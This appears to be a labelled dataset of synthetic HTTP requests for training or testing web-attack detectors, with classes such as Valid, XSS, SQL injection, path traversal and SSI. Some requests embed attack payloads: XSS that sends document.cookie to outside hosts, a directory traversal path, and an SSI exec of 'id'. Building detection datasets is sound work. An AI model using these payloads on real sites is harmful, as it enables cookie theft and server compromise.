Via: HTTP/0.9 161.171.157.8, 4he/1.7 www.idot2f.js:903, FTP/8.1 www.btet2p.tiff
Transfer-Encoding: compress
Upgrade: roy/9.0
Warning: 090 225.220.154.3:937 "oeyiszNeBarwra0etot" 
X-Forwarded-For: 91.122.10.141
X-Serial-Number: 8772849575
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26332
Start - Id: 47512
class: XSS
GET /lcqpHUO@62mM2kBr6/e89pdrYz/nR2mD50/gFpassthru82zk5/1LX.mspx?n2snssoieojmgt=ss&o8=dgtre6ew&KallfLJh=%3Cxml++src++%3D+++%22+javascript%3A++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.erta.com%2Fcgi-bin%2Fin.cgi%27%2Bdocument.cookie%29%3B%5D++++%22%3E HTTP/1.1
Host: 188.30.114.101:0767
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 218.133.141.85
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="7"
Date: Fri, 08 Oct 04 04:10:43 CET
ETag: W/"T.nifG87SHPiwpM4.IO4"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Thu, 13 Apr 06 15:53:13 CET
If-Unmodified-Since: Tue, 16 Oct 07 02:44:56 CET
If-Match: *
If-None-Match: "_pD5dcyXFwPMooY.FNWn"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.4
Pragma: lRetr='hhobli'
Proxy-Authorization: Digest nonce
Authorization: NTLM b29ycWxlc3M2U0lnNUk2SXdOcmNpYWVOdGZ0YWFlbW9mYWtpd2VlYWlybzdmZGc=
Range: 20-409392,508-532
Referer: /3hyOe/td6h/axetyis/ne1tl.dll
TE: trailers,deflate;q=0.0
Trailer: Range
User-Agent: Mozilla/8.0 (X11; U; Linux i586 7.1; te-ao; rv:7.0.3) Gecko/40870529
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: 5.2 www.Va6rl.html:4304, 9.8 73.29.81.37
Transfer-Encoding: deflate
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 71.118.200.104
X-Serial-Number: 870651819
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47512
Start - Id: 21766
class: Valid
GET /rhw6sHU/n1/bttBhrah5ee/UQZcmdWHh88Uskwt8/hW5lLTK/tbps/nU5/e-/e9Rjlpdiiao6/kinenAlu6.tiff? HTTP/1.0
Host: www.xoelesTa.gov:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: identity, gzip;q=0.5, identity;q=0.4, compress
Accept-Language: nnm-nakhE3ds;q=0.6, rimi-eE
Cache-Control: no-store
Client-ip: 255.171.87.96
Cookie: aseoj=63325433;iheeyeeaie5hR=oUqzI_I8T@U;ce=d 29objectHtejpsqco
Cookie2: $Version="772"
Date: Sun, 22 Nov 09 08:26:23 CET
ETag: "epb21oF5mTfNc.ET"
Expect: sh2lodw
From: twiato@ahnEode.ch
If-Modified-Since: Thu, 18 Oct 07 01:33:36 UTC
If-Unmodified-Since: Mon, 11 Jul 05 18:43:12 GMT
If-Match: "8eVisEh5N-UD@Hx"
If-None-Match: *
If-Range: Thu, 16 Sep 04 16:55:29 CET
Max-Forwards: 7
MIME-Version: 2.0
Pragma: 1tea=dsl
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: Digest nonce
Range: 4-,-68,1577-
Referer: http://www.Dsfr.org/anpccwun.jpg
TE: trailers
Trailer: User-Agent
User-Agent: rtlnotcRFueug
UA-CPU: PowerPC
UA-Disp: 8956,517,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9055x3634
Via: 6.4 www.oaetui.shtml:6082, FTP/3.8 59.171.170.128, 3.3 119.201.11.188:1566
Transfer-Encoding: deflate
Upgrade: shba/5.1, oaeihe/1.1, eb6t/5.9
Warning: 597 www.rnilf.jpg "annEhbbnde2eoenodht" "Mon, 26 Dec 05 11:59:16 UTC"
X-Forwarded-For: 221.81.223.145
X-Serial-Number: 229103908276446605
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21766
Start - Id: 20483
class: Valid
GET /hcH/ll@QGGgAr4bbMjiV6/n1zaLsnDFbRl.css?rEnsrt=htWm3WGlZo&iewl=a5a0sraw4a8ueaoq&slbty=5poDOFNM4&wtlNait=9517&ts1t=h&lbo44=o0tBdUfv&argeot9d3ogtarS=pdNHmj&iateddNnHs=5%40+&ope3eihacs0yio=OyapT+z&_76y3RW=execna&8linkJPlocation6hISiE=lrCeose+&O8Qe0X_R_RO=145539388&idEnobhlasOra9=o_Cmu1V&ZkTsMR5Q2Wnull=0671&rhentoj7iOomtS=85 HTTP/1.0
Host: www.rdizqlil5S.fr:28
Connection: Yweiiocr
Accept: audio/basic, video/mpeg, text/*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: htsea-scNz8a, h6aeo-h;q=0.6, btwie-nsfTEow;q=0.9, d3ekpz-rdan5
Cache-Control: max-stale
Client-ip: 117.165.251.243
Cookie: unah1l0nsi=edivoon
Cookie2: $Version="7"
Date: Mon, 19 Jun 06 14:32:34 CET
ETag: "G08a2XqgxXVoC6KbxFG6"
Expect: xakt=laq4H7
From: dsreo@aregoinma.st
If-Modified-Since: Mon, 25 Jun 07 05:33:49 GMT
If-Unmodified-Since: Sat, 04 Nov 06 15:52:42 GMT
If-Match: "@cWdRfDJfRkmyBNy4F"
If-None-Match: *
If-Range: "yTpRKWNUHQlY_0YK"
Max-Forwards: 6946
MIME-Version: 4.7
Pragma: bztEdqae=urnsz
Proxy-Authorization: Digest nonce
Authorization: oben igidkizl=mjho
Range: -896,61-724379,-171
Referer: /tdZ4idOe/nssmtunw/Lamryyay.dll
TE: trailers
Trailer: From
User-Agent: 19m6mure/3.8.7.5
UA-CPU: MIPS
UA-Disp: 428,0883,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3372x6941
Via: HTTP/3.4 120.48.22.145
Transfer-Encoding: gzip
Upgrade: qrcge/0.3, lfahc/7.7
Warning: 964 www.etc3ez7c.js "reaaIsd" 
X-Forwarded-For: 209.155.150.199
X-Serial-Number: 025237618
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20483
Start - Id: 47024
class: XSS
GET /paIpber0eslpHrd/Rndrnn3nso/0or9Nonglo.htm?aco=tTpk&UorcmdnMBIlfzperlA=s+mhtaccestornullqASnu%3BI%3EeE&hey7yleIjadtl=ehooced&ze3pstmvzeeoi=2&mnloechudeymTh=op%3D%2B+&lupdate7-cvMBH=3683647&9n=899014&wlt=5960&reicuEehnraa=uoei51eQa&yw3glWolssonu=4518&BeNC7window.openWI=%3Cimg+++++src+++%3D%22+++++livescript%3A%5Bwindow.open%28%27http%3A%2F%2F210.105.78.145%2Fis.mspx%27%2Bdocument.cookie%29%3B%5D++++++%22+++%3E&egdTekohYesaesg=%7Clit++0ailthavingptvr&nmlnneiT=ReIlibqoa+edNmfttats HTTP/1.1
Host: 242.127.84.4:5238
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-2
Accept-Encoding: deflate, identity
Accept-Language: 7hEy-e;q=0.1, eh9nNh6h-lvl;q=0.6, u4da-iep, aatm-hoerjr;q=0.9, a-iAw;q=0.8
Cache-Control: cnueSr='atte'
Client-ip: 170.28.161.6
Cookie: agtlevklkf=a3;bsbuFah7hoett=e5PLl@owch9
Cookie2: $Version="206"
Date: Wed, 17 Aug 05 06:30:00 UTC
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: Desiah@eghc.be
If-Modified-Since: Tue, 03 Feb 04 02:18:57 GMT
If-Unmodified-Since: Wed, 12 Oct 05 19:12:48 GMT
If-Match: "ieVx5xDcPhI6G.O-4n"
If-None-Match: "CZpaCf5RW7L.av6emYQv"
If-Range: "mK77eYIOtwX2hDt"
Max-Forwards: 2
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: guaey ansi2ou=Anhkil5
Authorization: teopp nccti=dojweplt
Range: -01,187926-7,-863
Referer: http://www.rtka.it/nffssir/ceeE/suBm/ndonodk/x5ioLtit.gif
TE: trailers,chunked,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: eer9nn8o4t
UA-CPU: MIPS
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: 5.2 www.lcle.png
Transfer-Encoding: identity
Upgrade: pil1/7.3, dxAvc/4.0
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 239527167
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47024
Start - Id: 45352
class: PathTransversal
POST /nFed1E6t0rweqx03rw/vdbebr2ihint5/oe/PkciWaPv2xp_d2YU6/scChaecSovh/egsO.TB.y/ssamD-fromKXUVrBnhnetcatJ/eW_Uy3ptnnKYAaiL/ceD/spibBthwahtnia/H5evguead/r5Y022-L.asp? HTTP/1.1
Content-Length: 174
Content-Language: YeS0t9
Content-Encoding: gzip
Content-Location: http://www.Qeel.gov/Ewoodsdl/teGadzaa/eepetsr.dll
Content-MD5: c25naWFmZmVpbmVlZGFuYQ==
Content-Type: application/x-www-form-urlencoded
Host: 20.184.126.78
Connection: keep-alive
Accept: image/*, image/*;q=0.2
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate;q=0.0, identity;q=0.6, deflate;q=0.7, identity, identity;q=0.5
Accept-Language: *;q=0.9
Cache-Control: min-fresh=96848
Client-ip: 66.195.135.123
Date: Wed, 24 Jun 09 13:21:15 UTC
If-Modified-Since: Wed, 16 Dec 09 10:23:14 UTC
Max-Forwards: 489
Pragma: cnIs=aryeu
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Referer: http://www.5wsro.com/en2F/kttoyts/yfucah/nsdh/n10S.bin
User-Agent: Mozilla/3.9 (Windows; U; Windows NT 9.3; g0-nh; rv:7.1.7) Gecko/04024518
Transfer-Encoding: compress
----: ----------------------------------------

hateaOP=Emsn&asyose5erc=095382&u1Assock_streamu-gr=emqTtvEnelew&GQ04Edeletedivn=8&etrrPEglx=/../../../Inetpub/iissamples/en/timees/nsng/altellin.nsf&53cm=sw

End - Id: 45352
Start - Id: 28523
class: Valid
GET /Tapldnln/mfpvaeetmrajssd/tW.Gx/T8/cohDznemoemrwcwhlhi6/1smaosdtdcEier7lzwt.jpg? HTTP/1.1
Host: www.f7cnHo.biz
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: g-tolskrei, aevEsgl-n, ttsgcTo-gtd
Cache-Control: yraeen='ufa'
Client-ip: 86.240.167.85
Cookie: iUraen=70052828;csgitigizh=sdttae;et3sggcb6Un=rmlike 
Cookie2: $Version="88"
Date: Sat, 10 May 08 06:35:39 GMT
ETag: W/"jk3QcDDG_iuMN0Cb1iO"
Expect: ehGe=nuzcoon
From: oSchO@nretCorwsa.st
If-Modified-Since: Fri, 24 Jun 05 15:44:43 CET
If-Unmodified-Since: Sun, 03 Jun 07 02:21:58 CET
If-Match: "mGZu@dswMCodRSPWdW1"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 6.5
Pragma: arlocE='v9teef'
Proxy-Authorization: rfNki eds412id=t8vE
Authorization: grai4e h9zfi=cac8dncs
Range: 7-93,534-66746
Referer: http://www.naedl.uk/t8to8oe.cfm
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.9 (Windows; U; WinNT 1.1; tr-il; rv:7.2.6) Gecko/34875465
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x668
Via: 3.8 www.J1m8.tiff
Transfer-Encoding: gzip
Upgrade: ssc6/7.2
Warning: 648 www.ttih.html "ord3rsoanoeqih" "Mon, 01 Jan 07 08:14:14 UTC"
X-Forwarded-For: 32.243.80.201
X-Serial-Number: 672108482852
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28523
Start - Id: 19874
class: Valid
GET /NehddaO/6t9eCbt1eIo/tP/It3aheYfgmeobiacasq3/yuuR.xtl.hU41x/a1oehklj1saiLndtyh/lphrS8XiY-/l6tdsi2tlxeiuw/tu.jpg?uphtrnltAezzex=r7s3Ttps%3C%7E%7Ee&wtUHOg-D5=aY4c8&poilwej4=hDdj0bV2.sJA&ldtenFoL=h%40%28mb&QHtyR@yM93=kN&rmn9caeteasr=3tobjecti&bVcopyzzopthnN=%3Bynhxc%2BlocationpositionrrraoR+&eiwds=6319154526 HTTP/1.0
Host: www.ga9nCI9ra.gov
Connection: cdern
Accept: text/plain, audio/basic, video/*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 6.254.55.51
Cookie: i3tkyn6nehsenia=Nnmaile;teddsohaAfjnase=te1;mw;eenn3ouaTntvl=8198;tti=5705769
Cookie2: $Version="919"
Date: Wed, 01 Nov 06 15:03:50 GMT
ETag: "EOrffeq49PfEhy3d0pn"
Expect: 100-continue
From: ebMr@ot7cggaev.net
If-Modified-Since: Sun, 27 Jan 08 01:35:36 CET
If-Unmodified-Since: Mon, 05 Oct 09 18:17:48 GMT
If-Match: "HyHK6jA0tOAkKxmYzvHn"
If-None-Match: *
If-Range: *
Max-Forwards: 400
MIME-Version: 6.7
Pragma: tgTmmiat='p1i'
Proxy-Authorization: tIsore haesemqr=7tm5
Authorization: tea1o nhanj=jrinhc
Range: 752-,475-082626,-6481
Referer: /EsC5aaf/7nue/rNeDtos/eLRlhumi/nnCeCw.asp
TE: gzip;q=0.8
Trailer: Authorization
User-Agent: cdreior0iiers3u
UA-CPU: MIPS
UA-Disp: 8808,8661,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 378x5840
Via: HTTP/7.5 www.utjHmice.shtml:70
Transfer-Encoding: yi6i; hpoerBe=tpefDqr
Upgrade: ieot/7.9
Warning: 796 165.248.243.125:49 "nsa0mTYgni7ti" "Wed, 31 Mar 10 02:21:30 UTC"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 55629847157981677810
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19874
Start - Id: 28290
class: Valid
GET /o4V1P67qDH@uTO-QAf2/1G6/aQm_quF_O1OmAzk@omNN/mHfF6mgoXXEQJQP10/oeothegtts/z_mKT/DXbFRxqAZWR3catlo/0Ir_allOX1divV.html?T4JQP=dobeeenod7pteX&edlia=225265579&lwqn=Eeym%24eEni%29ftof%5Bo%5C0&O7Brrq0m8yp=oha%26Kfnwe%5Bb%3Er%25ncd%40at&at5=oino&t4Nlwgt=k&7pge3Hl=nmlC&iapuptoeicssg=39l%3B&hmSNr3R=lofeteuieNh&tsBenLsCRtb=kfprahmeDi&godd=Shir&inputrCJgd-bEFK=vKyfEq7h4QLK&dtmotthk=8+%3Evbscript%7Ctnetcat1lof7rwaego&rb=%3CAs%26+&nad=rsoedTannxinDes2 HTTP/1.1
Host: www.lmahf2.fr
Connection: close
Accept: */*;q=0.0
Accept-Charset: koi8;q=0.2, iso-8859-2;q=0.0, windows-1254, iso-8859-1
Accept-Encoding: 
Accept-Language: ang-ddtaamfo, o-io;q=0.4, ksi-Foi, atte-etr, 8-o;q=0.2
Cache-Control: no-store
Client-ip: 79.12.235.104
Cookie: 5tGIseaeiIn=06;_zeRtV7.Dp58=6nes(vetfwtt
Cookie2: $Version="911"
Date: Fri, 19 Sep 08 19:14:03 UTC
ETag: W/"8Fd9EHTVSWp@LX6ZdoN"
Expect: tst4d4=sorE4;haoicm
From: cBaMr@modtsl4l1o.biz
If-Modified-Since: Mon, 02 Jun 08 11:21:52 CET
If-Unmodified-Since: Fri, 20 Nov 09 12:31:38 UTC
If-Match: "8EyQ5vtjrwbp8-b"
If-None-Match: *
If-Range: Wed, 23 Jan 08 04:19:53 UTC
Max-Forwards: 1
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: olaif WunoaCa=aerw
Authorization: tetr ivfc=rec7Eemd
Range: 929-162
Referer: http://www.cqirles.com/lihG/ttcou1o/tEaehtoa/raacle.php4
TE: trailers,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: Mozilla/3.5 (Windows; U; Win 9x 6.3; mc-n7; rv:7.9.0) Gecko/67329541
UA-CPU: x86
UA-Disp: 359,4370,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7134x450
Via: 0.3 73.193.123.158
Transfer-Encoding: nsoeti; Nsdatl=e98a
Upgrade: iaRtso/6.7, aakyo/7.1, oash/9.5, mwdp/3.3
Warning: 207 www.iRadateo.png "Hkr6Ecnpnearvdrttm" "Thu, 13 Aug 09 17:46:46 CET"
X-Forwarded-For: 48.186.166.27
X-Serial-Number: 3984354
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28290
Start - Id: 25047
class: Valid
GET /uGencNQgkIElocationyjQ/ThrtldiIlentr.css?essalus5otj=024952&cvtTldsNdocumentk=tJ3RTrwY&tp3oqn=tglwaoFdlj+shome&sEH2ymnnro83k=%29eV&srk0u=1tiM-a%28%3Fcatrc7a HTTP/1.1
Host: 77.118.188.94
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: r0-enn, ssfweu8-eIqtih;q=0.6, dtay-ldab;q=0.7
Cache-Control: max-age=29115
Client-ip: 68.200.80.51
Cookie: 8jvDoy0link@IR=$dw;onox8zlCskehc=97696
Cookie2: $Version="3"
Date: Fri, 19 Aug 05 09:57:58 CET
ETag: W/"4Za38LYvU1h@026ySz"
Expect: 100-continue
From: Nett@Mbgoe.fr
If-Modified-Since: Tue, 11 Dec 07 04:35:20 UTC
If-Unmodified-Since: Thu, 25 May 06 14:07:37 CET
If-Match: *
If-None-Match: "sFTo7QFl57w1aSERji"
If-Range: *
Max-Forwards: 5397
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest qop=auth
Range: 978-9166
Referer: /e8ldsh/iEetxks/hbitnmsj.shtml
TE: deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.8 (X11; U; Open BSD i586 0.0; ro-Mo; rv:8.6.3) Gecko/02526950
UA-CPU: x86
UA-Disp: 002,8745,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6866x078
Via: 0.2 168.208.38.243, 6.3 144.58.200.227
Transfer-Encoding: identity
Upgrade: TpPo/7.9, mmA/5.5, srAneh/5.3, eag/1.0
Warning: 154 www.tw6sot.shtml "4eodetrlyah" "Tue, 21 Mar 06 01:21:00 CET"
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25047
Start - Id: 42050
class: SqlInjection
GET /hmpwneoioiilhaorrf.gif?ednasi=7677565&dropY0dVPpasswdPh=acweW2ztthsehtMoh8&pesIerelte2eNL=ooc8nmtctrhnnaocu&YoqzDb=8uMo%40U6.1t&aqnkrft4inrrHd=%27select+++customer_phone++++%27%7C%7C%27from+customers+%27%7C%7C%27where++++customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27++++and+++customer_type%3D1%27%3B&gnsig2=9econnect%25uqnk%2BrnN4&glogUhAeQ5passthru=18653&eersktafdtcarig=%28tgNvar&zodb6Teyz6=04701&tH9dnsdn=%29hs&tmseeraTrgh=058076862&c21hercu0=5s5e6oyItiHna7soso HTTP/1.1
Host: 7.185.40.47:80
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish, hz-gb-2312
Accept-Encoding: *
Accept-Language: rzftl7-haDRaysa;q=0.0, tm-td7d7E;q=0.8, 0faes-wuariew
Cache-Control: only-if-cached
Client-ip: 80.124.231.161
Cookie: hiathnu=/aO;hglfvdAbvNn=55220061;c0=9;rHhplk=+muredlnm)dwDe;aemeap=yto
Cookie2: $Version="46"
Date: Sat, 03 Jul 04 10:32:51 CET
ETag: "zWjqHOL2ecS3XXB"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Fri, 26 Oct 07 08:20:18 UTC
If-Unmodified-Since: Fri, 17 Oct 08 01:02:30 UTC
If-Match: "UAu7Nxi2ofVptVy"
If-None-Match: *
If-Range: *
Max-Forwards: 83
MIME-Version: 8.6
Pragma: hohu=eOrbE
Proxy-Authorization: Digest nonce
Authorization: 5hra 0ytzc=3ariec
Range: -7
Referer: /etRear/t1rrnAW/hn9mr.dll
TE: gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/2.5 (X11; U; Linux i586 0.3; id-iy; rv:2.2.7) Gecko/17180333
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 307x472
Via: 7.4 www.t6X6eh.tiff, 5.3 www.remfWiIg.shtml
Transfer-Encoding: gzip
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42050
Start - Id: 1848
class: Valid
GET /phluPa/3-_brE8h/50.okUrydor-Joau/h4@FselectPTH/npNyNscxwjnuY/jra8paorwi3rd/e2czj2DboxImp.EXle/lseongah3izrterndHru/o.B.cgi?9ewp-4=G+o&an1iil6iehea=loJmdn8iht5x HTTP/1.0
Host: www.e4elas.de
Connection: keep-alive
Accept: application/postscript;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: we6f-mi3rtv6e, tnL8ld-ozott0kk, se-e
Cache-Control: i=gtoua9h
Client-ip: 91.1.95.32
Cookie: A2oRdfreeajie=200
Cookie2: $Version="44"
Date: Wed, 01 Jun 05 05:35:33 CET
ETag: "Ax-jm_fdfddxcb-a"
Expect: 100-continue
From: nentele8@rc6nelreEt.be
If-Modified-Since: Sun, 06 Sep 09 17:11:08 CET
If-Unmodified-Since: Sun, 09 May 04 13:41:18 CET
If-Match: *
If-None-Match: "Vt@iEtRZKQKr2Xn"
If-Range: Tue, 28 Nov 06 11:22:04 UTC
Max-Forwards: 982
MIME-Version: 9.5
Pragma: ein6ks1d='lteTri'
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: NTLM aWl3ZnJhanRub2xndG1raDBFUmVpdXI1aWVobmFUYWl6dA==
Range: -34624,61390-055,75119-
Referer: /tjolid/3tI8ck/eobihfa/Ssah8Do.mp3
TE: chunked,trailers,trailers
Trailer: Range
User-Agent: iamusRrh/9.8
UA-CPU: x86
UA-Disp: 868,0811,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 870x566
Via: HTTP/0.0 www.lliu.css
Transfer-Encoding: deflate
Upgrade: hNhon/3.1, otosd/5.7, geys/5.0, rhg/7.2
Warning: 891 118.182.25.94 "epdstea40lccSt7xiAtm" "Tue, 07 Sep 04 24:57:56 UTC"
X-Forwarded-For: 62.33.15.123
X-Serial-Number: 64954855399337418
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1848
Start - Id: 6672
class: Valid
PUT /okz1ur70/wqQ7RgW_0b6B/KceXz3passthrua/rahranaeq/OwXznpassthruDQabreplaces.exe? HTTP/1.1
Content-Length: 210
Content-Language: 8r7lh,arl
Content-Encoding: gzip
Content-Location: http://irde.fr/sye3w/Unfcce/vciRte/zrse/iDQnsku.tiff
Content-MD5: MmNoYXBoVWRFdjJ3djg3cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Dec 07 19:41:56 GMT
Last-Modified: Wed, 14 Apr 04 19:59:25 CET
Host: www.sepirer.org
Connection: keep-alive
Accept: audio/*;q=0.8
Accept-Charset: iso-8859-15;q=0.1, utf-8
Accept-Encoding: compress;q=0.3
Accept-Language: s4koef-Ttod
Cache-Control: only-if-cached
Client-ip: 3.121.174.35
Cookie: hSdCi=itevalnedF;avtscsFwsb=950242
Cookie2: $Version="712"
Date: Thu, 16 Jul 09 05:17:19 UTC
ETag: "vYsxOSquYPtEQpUW"
Expect: 100-continue
From: R5anodt@eiRwb.com
If-Modified-Since: Sun, 13 Apr 08 20:16:36 CET
If-Unmodified-Since: Sun, 26 Mar 06 09:54:08 CET
If-Match: *
If-None-Match: "PadfirSYfyyYUnANxJS"
If-Range: Sat, 14 Oct 06 20:45:50 UTC
Max-Forwards: 987
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic NG1kanBpOmllSGVocmVp
Authorization: Digest uri=/hsnaio/1nnwO/sdgtkre0.fgf
Range: -70
Referer: http://www.n6e0s.cz/agud2i/9s6wjar.sh
TE: gzip;q=0.4,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.5 (compatible; Konqueror/5.1; Solaris; t7yx1mpseG)
UA-CPU: Sparc
UA-Disp: 6078,616,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 075x397
Via: 4.7 www.oRays.jpg:194
Transfer-Encoding: rT4hn
Upgrade: ouir/8.6, le8mS/3.9, uip/7.9, oinia/7.0, igMoc/1.2
Warning: 713 www.8inlfdnc.js "eao0a8Dsgeo" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5HawIyreiNqsl=aoeO&vbscriptlsnode7div@81Jmib=078&sneddgkwvdon=U9sena&teeIwr= egdservices~cdNneyMulibrwE&jxfDGq9H=enihometm&rr56=5615&nsLuneeeh=(rreplaceg&de3rSk=14778737&bslocationAI_Xslinkvhttps=ueuhgeaawa

End - Id: 6672
Start - Id: 11058
class: Valid
GET /Xttiehrleusou0voe/c2LEAqkavKz5SfZlyFI./sFQ4P@JWw@kncD./r9h/Omtecdralht5teocbr/aettelisH3Yhsl69do/RV/heh5sairuamisIs/tGiFn-p.jpg? HTTP/1.1
Host: 240.232.79.30
Connection: mtnihR
Accept: audio/basic, text/xml;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: m-osoiwt;q=0.6, ioog-es, or57oZu-hoTealij;q=0.5, loie-qhh, bp-6d;q=0.6
Cache-Control: no-cache
Client-ip: 224.189.199.226
Cookie: sszdigr7= l 4Em
Cookie2: $Version="383"
Date: Sat, 16 Aug 08 21:16:55 CET
ETag: "5ceGnLW7Rm.THDjabofc"
Expect: 7bds
From: e9esarYc@ncTsfi.org
If-Modified-Since: Thu, 09 Aug 07 06:32:24 UTC
If-Unmodified-Since: Sun, 10 Jun 07 05:16:18 GMT
If-Match: *
If-None-Match: "Op7S5BASabSCVq6j8Ir"
If-Range: *
Max-Forwards: 91
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: aeeWg xqe5owa=r1ap5OA
Authorization: ornt3 iHrTrw=gnAnblLi
Range: 940539-433
Referer: /nctU/faad0/zuers.fgf
TE: deflate;q=0.1,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/3.1 (X11; U; Open BSD i386 1.8; mF-li; rv:8.6.5) Gecko/82033064
UA-CPU: x86
UA-Disp: 0717,4017,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1068x1035
Via: FTP/1.9 79.70.171.163, neq/5.0 181.36.207.116
Transfer-Encoding: egao; tsom=tucat
Upgrade: orc/1.6, 9fle/6.2, 08otw/8.4, Zmleef/2.9, tDi/7.7
Warning: 698 100.215.217.10 "oajheeieawececdyAtFs" "Thu, 07 Jan 10 05:01:29 GMT"
X-Forwarded-For: 42.148.64.117
X-Serial-Number: 5468318216
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11058
Start - Id: 39954
class: SSI
GET /8EdropPebG/ntewr7cm77csskNriu/hMnstyle38WTwu0z03J/wndvODW/eradup/iR9wffA9NfiqBb.nD1.dll?m7=tfMPKf&NvbscriptgKxKyQ9=nce%2Fra+pi1u+td+&_P6kQinnullLEhq=%3C%21+++++%23%3C%21--+++++%23exec++++cmd%3D%22id%22--%3E&ro0hIangeudri=4&ao=d%24r+&dtae=iep96OpkF&szm=b+nq%3Dlrrsbetweenf9fd&opla=ePG&ent6r=efp%3ENplwinnt%2Ft&255fesgsdo=3860577824&ehlhv19lutAot=i&peprep2zaDh=dLiEian2nxleUin&ee5=o12f3o&eaAdmt=%3Fc&ekg6Soijsigc=otea HTTP/1.0
Host: www.soNeyo.st
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.2
Accept-Encoding: *
